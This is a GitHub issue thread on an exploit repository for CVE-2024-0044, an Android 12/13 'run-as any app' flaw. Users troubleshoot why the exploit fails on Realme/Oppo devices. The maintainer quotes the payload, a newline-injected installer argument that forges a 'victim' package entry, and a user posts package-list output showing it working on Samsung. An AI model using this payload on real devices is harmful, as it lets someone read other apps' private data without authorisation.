search

0xbinder / CVE-2024-0044

CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13
260 stars 60 forks source link

Run-as doesn't seem work on realme/oppo devices #11

Open mind-spacer opened 4 months ago

mind-spacer commented 4 months ago

I have tried on the Realme/Oppo devices, but it is returning this error.

RE879EL1:/ $ run-as victim run-as: unknown package: victim

I looked into the /data/system/packages.list file, I found that the victim entry is not there (somehow it is getting trimmed out). How to resolve this?

0xbinder commented 4 months ago

what output does it give after running the payload part ``PAYLOAD="@null

victim id 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null" andpm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk``

mind-spacer commented 4 months ago

Apk is getting installed and it returns success

FYI, I have tested on a Samsung device which works perfectly fine. then, I pulled the packages.list from the dev it is showing new entry of "victim" as mentioned in the PAYLOAD. But In case of Realme on the packages.list file there is no new entry other than the F-droid.apk package.

Also in realme, packages are getting installed as 'pc' instead of @null

this is the Samsung's /data/system/packages.list 

org.fdroid.fdroid 10109 0 /data/user/0/org.fdroid.fdroid default:targetSdkVersion=33 3003 0 20230324 1 @null
victim 10055 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null

And for Realme only this getting,

org.fdroid.fdroid 10254 0 /data/user/0/org.fdroid.fdroid default:targetSdkVersion=33 3003 0 20230324 1 pc

0xbinder commented 4 months ago

The reason for the failure is attributed to March 2024 security patch.

mind-spacer commented 4 months ago

But the tested Realme device is on Sep 2023 security patch. It should work on this patch, right?

0xbinder commented 4 months ago

Yes should work .I tested the exploit on samsung devices and pixel. I'll checkout where the issue might be but incase you find it just create a pull request

mind-spacer commented 4 months ago

yeah sure.

Rocky8088 commented 3 months ago

I have tried on the Realme/Oppo devices, but it is returning this error.

RE879EL1:/ $ run-as victim run-as: unknown package: victim

I looked into the /data/system/packages.list file, I found that the victim entry is not there (somehow it is getting trimmed out). How to resolve this?

I'm also facing this error